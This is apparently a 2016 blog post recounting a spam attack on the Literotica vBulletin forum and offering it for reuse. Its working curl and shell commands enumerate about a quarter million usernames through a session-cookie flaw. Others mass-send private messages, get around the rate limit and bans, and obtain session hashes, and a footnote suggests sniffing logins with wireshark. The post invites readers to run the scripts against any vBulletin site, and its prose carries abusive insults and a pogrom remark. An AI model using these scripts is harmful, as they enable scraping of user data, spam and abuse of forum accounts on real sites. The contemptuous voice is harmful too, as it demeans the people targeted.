Files from the War on the Web. Today, Literotica.

Monday, 11 April, Year 8 d.Tr. | Author: Mircea Popescu

Mottoi: Dear ElectroLux,
Thank you for registering
at the Literotica Discussion Board.
Before we can activate your account
one last step must be taken
to complete your registration.


~ * ~


As you're perhaps aware, the Republic has been involved (through select participants) in a war against the world wide web for nigh on a coupla years now, with a view to destroy even the possibility of the illusion of identity entertained by the subhuman bipedal herd. To quote an earlier piece on the topic,

mircea_popescu The idea being that any current "social media" website is a defective implementation of the WoT, what I intend to do is prove this point. Because the sort of idiots involved won't figure it on their own, and the assholes a la zuck and conde nast have about as much interest in the matter as your random bank cares about getting off shitty buggy ms software.

[...]

This will put an end to all socialistoid crap, about how "the group" is the solution. In computer times, the group can't even exist. I want the average redditor to understand that when he interacts with a screen name, he is not interracting with a person.


~ * ~


On the other side of the dotted line, Literotica is the web's foremost collection of purple prose and assorted fanfic (that I've been known to occasionally rewriteii / deride). It has been around for a long time, doing the entire UGC thing that was supposed to save the webiii but meanwhile failed. On the strength of its sheer age, and of its feverishly encouraged cultishnessiv it is perhaps possible that it can extract enough actual value out of the sort of idiots that'd seriously engage with a website to perhaps pay one or two persons' bills.v


~ * ~


For the practical side of today's article, we take a closer look at literotica's own forum. It's quite the thing to behold!

<!--
Database error in vBulletin 3.6.11:

MySQL Error  : Deadlock found when trying to get lock; try restarting transaction
Error Number : 1213
Date         : Thursday, April 7th 2016 @ 04:42:57 PM
Script       : http://forum.literotica.com/private.php?do=insertpm&pmid=
Referrer     :
IP Address   : 216.150.33.122
Username     : Alexandrine
Classname    : vB_Database_MySQLi

-->

Moving right along : our newly created account carries id number 3`141`520. Obviously, it's trivially serializablevi, and we proceed to do just that :

for i in {1..3141520..12}; do    curl -A "Mozilla/5.0 (X11; Ubuntu; Linux i68\
6; rv:20.0) Gecko/20100101 Firefox/20.0" --cookie "bbuserid=3141520;bbpasswor\
d=ccd85bc2d6499af68fe54c2ccd17f7d7;bbsessionhash=85c5337416c242153f0d339507f0\
f0f8"  "http://forum.literotica.com/private.php?do=newpm&u=$i" | grep "recipi\
ents" | grep '"pmrecips"' > literotica.txt; done 

This will neatly collect all names of users that can be sent PMsvii into a file called literotica.txt.viii The third value in the for loop works as a modulo : you can run this over a dozen machines counting from 1 to 12 and will get the whole list twelve times as fast.

The results have to be cleared of assorted web gunk before actual use, perhaps through something like

cat literotica.txt | sed 's/					<div id="pm\
recips"><textarea id="pmrecips_txt" name="recipients" rows="1" cols="50" ta\
bindex="1">@@g' | sed 's@</textarea></div>@@g' | sed '/^\s*$/d' > lit.txt

The whole exercise should take about a dayix. So equipped, we can now proceed to the next step :

cat lit.txt | while read line; do curl -A "Mozilla/5.0 (X11; Ubuntu; Linux i6\
86; rv:20.0) Gecko/20100101 Firefox/20.0" --cookie "bbsessionhash=637acf4e724\
f669cc26c6ebb2e6d0069" --data "recipients=$line&bccrecipients=&title=Do+me+a+\
favor&message=Mind+reading+my+story+and+telling+me+what+you+think+%3F%0D%0AHe\
re+it+is+%3A+http%3A%2F%2Ftrilema.com%2F2013%2Fannas-adventure%2F&iconid=0&s=\
&securitytoken=0f2cc0a4e28aa07a7c2bbc4adcb15a743205222e&do=insertpm&pmid=&for\
ward=&sbutton=Submit+Message&savecopy=0&parseurl=1" "http://forum.literotica.\
com/private.php?do=insertpm&pmid="; sleep 16; done

This will read the whole list of ~1/4 million names, and send each a private message linking them to Anna's adventure, which is certainly better than any story found on Literotica. The "securitytoken" item is a purely decorative, static hash displayed on the page. savecopy should be false so that your 150 message limit doesn't get overrun. parseurl being set seems reasonable. The sleep is there because vBullshitetin enforces a 15 second delay between messages - obviously you can get around this throguh splitting the file up between different "accounts" set up on different machines.

After about a day of this, Literotica noticed, and proceeded to... ban the accountx ; to "fix" its vBulletin package in the dubious manner discussed in footnote viii and finally to ban the word "trilema", so that it is replaced with *s everywhere on the forum.

While I'm deeply flattered by that last measure, nevertheless url shortening services do existxi, banning accounts can never do anythingxii and uh. Lol.


~ * ~


In conclusion : Yes the vBulletin package is a ridiculous piece of junk consisting of mostly holes by mass, but nevertheless all web forums are vulnerable to the above described attack, fundamentally and irreparably. The only solution is the WoT, and gossipd - and these are fundamentallty exclusionary solutions, they are intended and designed so as to not work for everybody. There are no solutions for everybody, nor can there ever be solutions for everybody. Everybody is cordially invited to drop dead, actually.

PS. Yes, the above will work on Literotica as is - have fun. It will also work on any other vBulletin, with minor changes and adjustments. Have fun. It will also work on any other anything, with slightly more changes. HAVE FUN! Because traffic matters, right ? It's worth money and all that, it's a thing. Dun dun dun.

———
  1. Hey, it's almost like poetry! []
  2. I happen to believe in rewriting as training for a writer. Only idiots disagree. []
  3. Here's a brief history of the WWW :
    1. Some people thought it'd be a cool idea, made a prototype.
    2. University management types decided to offload their article librarizing costs onto the nascent WWW. This went ever-expandingly for a decade, to the point even undegrads had web access eventually. [Note that at no point is the www equal with or equivalent to the Internet!]
    3. AOL decided it may try to make a buck exploiting the intelligence differential between the WWW at the time and its customer base, in the form of charging the latter for access to the former, without paying the former for the damage. Capitalism is all about externalizing costs, amirite ? The cataclysm is known as Endless September ; it consecrates the pattern of exploitation already introduced in 2 above to be used without exception at all ulterior points.
    4. Various corporate actors and AOL wannabes (such as failed child pornographer / concern troll Jimbo Wales, among many) go to work on vague theoretical avenues to replicate the AOL exploit. None of their shit works in practice, or could even work in theory, but the noise they make is so ample and its composition so thick lots of people end up "investing" in the nascent scam (Paul Graham, one of the original Ponzi masters, told the story in a desperate if doomed effort to misrepresent his involvement as accidental, unintentional etc.)
    5. The voting machine turns suddenly, "unexpectedly" and who-could-have-predictedly into a weighing machine. The event is memorialized as the popping of a retrospectively named dot com bubble, which fortunately quiets the scammers - if briefly.
    6. Various attempts, mostly unsuccessful, to restart the Ponzi engine. There's talk of "web 2.0" and whatnot. The sadness on the "marketeers"/rapists' faces lasts almost half a decade, and is quite satisfying.
    7. Eventually something called UGC comes out a winner, and the various scammer factions all rally behind this oh-so-novel ideology. The central idea is that there's a wide untapped reservoir of free skill, ability and work "out there", and all someone needs to do is "create the tools". Because you see, talented, skilled people are constrained (by "God", by "duty to king and cuntry", by whatever - don't ask!) to create, much like bees are belabouring under a compulsion to gather honey. It's not like they could just ignore the horde of idiots, oh noes, they must! THEY MUST! participate. So therefore, the zombie logic goes, whoever makes the best bee tools will gather the most bees and then "network effects" will make all the bees join and one wins the Interwebs!
    8. Google succeedes in taking over the past role of Yahoo as the hot core of the freshly restarted Ponzi engine, on the strength of very little graph theory (which only shows how very little actual work anyone ever puts into these ill baked schemes) and ample stockpiles of "UGC"-flavoured chumpatronium. It becomes "worth" billions in the same delusional dollars in which Yahoo was worth billions before ; except with a lot more USG involvement reflecting the overall turn of the US economy towards central planning in the third millenium.
    9. Myspace, formerly the largest UGC "success" spectacularily fails "for no reason", trading a billion of Ted Turner's money pre-Ponzi into fifty or so million. All other attempts fail similarly - slashdot sells for pennies etc. Due to USG involvement however this sad reality is constantly doublespoken, and patent scams such as "groupon" as well as earnestly hopeless ventures (Facebook, Twitter, you pick 'em) that plainly admit they aren't nor ever could make money are still officially regarded as valuable and "powerful" in spite of obvious and uniform proof to the contrary. You are here.

    []

  4. In the www scammer cant, this is called "niche"-something-or-the-other. The fact remains that the sort of imbeciles living there actually send private messages to robots, attempting to engage the machine in chit chat, with a view to discussing the sent link. They're concerned, you see, that it's "outside of Literotica", which is not what the admins told them to click!

    Such behaviour is perhaps indicative of a highly concentrated population of old ladies - and as every marketeer knows, that's where the money is. Sell them fifty years' worth of paper goods, and eleven pianos! []

  5. Later interaction showed this not to be the case. Moderation seems to happen on a purely voluntary (ie, unpaid) basis, for a total effort worth maybe one or two hours per day. Very much reminiscent of the other shitpile documented here, which also appeared to be making money from the outside, but then once inside it showed itself to be just like any other decaying, bankrupt concern : skimping on all the things one can't afford to skimp on. []
  6. Recall some other UGC WWW item that also had 3mn users ? []
  7. Literotica, like all vBulletin systems, allows users to opt out of the PM system. But it also allows them to receive email notifications, fancy that wonder!

    Yes they include the whole PM text. What, problem ? []

  8. At the time this script ran, the implementation was ruefully broken, allowing the bbsessionhash to be freely overridden through providing the password hash and userid - which is how I walked their user db on a set of machines, with data fully derived by another set of machines.

    They finally (and as per SOP, silently) fixed this sometime on the 8th. Now the bbsesshionhash is the only point of security, so you have to get your own local value. Obtain it through the age old and well revered

    curl --cookie-jar - -A "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:20.0) Gecko/201\
    00101 Firefox/20.0" --data "do=login&url=%2Fusercp.php&vb_login_md5password=7bc6\
    6d4625c71a3bd3dd6e1505050616&vb_login_md5password_utf=7bc66d4625c71a3bd3dd6e1505\
    050616&s=2103425bcbb7d00c7a53d03d7ddebe95&securitytoken=97a05da1a86f22b3fdae7a54\
    a39a1722cd24ca7b&vb_login_username=ElectroLux&vb_login_password=" http://forum.l\
    iterotica.com/login.php?do=login

    Obviously you will have to construct the md5 -YES!- hash of the password yourself (twice - once for UTF and once for STN aka shit thee not) to use this, or else could spy on an ongoing session logging in with something like wireshark, httpfox or whatever it is you use.

    Once obtained, the bbsessionhash is invariant during a "session", which means practically forever. []

  9. If you've not the patience, here it is. []
  10. It seems to me there's something fundamentally wrong with this. I wouldn't say I'm insulted, as I couldn't give less of a fuck, but there's still something fundamentally wrong with the reaction.

    Suppose someone does to you something that, as far as you know, shouldn't be possible. Would your reaction be to try and somehow "disappear" them, because in your retarded mind the fact that they have powers you don't understand must mean, perhaps through some sort of weird Universal Equivalency Principle, that you also have powers you don't understand, such as to disappear demonstratedly superior entities ? Or would your reaction rather be to grovel before their manifest greatness, and beg for enlightenment ?

    It would seem, on prima facie consideration of evolutionary theory, that the demuring behaviour is severely maladaptive, and would very rapidly be rooted out of most any population, with the groveling behaviour universally the naturally enforced norm.

    I suppose this is yet another sign of just how divergent from reality consumerist/welfarist society has become, or something. In all honesty I have no good theory to explain the insanity. []

  11. And their existence exposes the woefully impotent UGC-WWW sauce. Seriously, six clicks out of which two were me testing the damned thing ? And you're going to make money ? How, advertising ? Really ? Selling things to people ?

    Don't tell me, let me guess. The... advertising campaign wasn't... correctly tailored. Right ?

    Lmao. []

  12. See the republican discussions on the topic of "enumerating badness" for insight into this important point. []
Category: Meta psihoza
Comments feed : RSS 2.0. Leave your own comment below, or send a trackback.

6 Responses

  1. Why was this particular target chosen for demolition? (What is interesting about this particular sp4m0rum ?)

  2. Mircea Popescu`s avatar
    2
    Mircea Popescu 
    Monday, 11 April 2016

    Chance plays a much larger role than choice in these matters.

    Why was this particular balabusta "chosen" to be so displayed ? She's not chosen ; on the contrary. There's no choice involved in pogroms, and deliberately so.

  1. [...] not expected to understand this image, but moving on : while scouring the web to find that pic of the Lvov massacre, I ran into various quotes about the sexual escapades at the time. Such as : [...]

  2. [...] this purpose, like it doesn't work for any other. Yes, I'm aware that this goes against the theory, the one last remaining theory aiming to explain why the shit's supposedly worth money. Boo hoo. [↩]A rush seen before, [...]

  3. [...] nobody could have predicted, I guess. Obviously, the userlist is trivially iterable, this being the same old vbulletin crap, and so if you're here because you received an email about how PBNation is a piece of shit - [...]

  4. [...] in theory as well as any practical implementation (I have more examples than words). See also this footnote for a historical overview (which is proper, all this "traffic" bullshit is naught but a footnote in [...]

Add your cents! »
    If this is your first comment, it will wait to be approved. This usually takes a few hours. Subsequent comments are not delayed.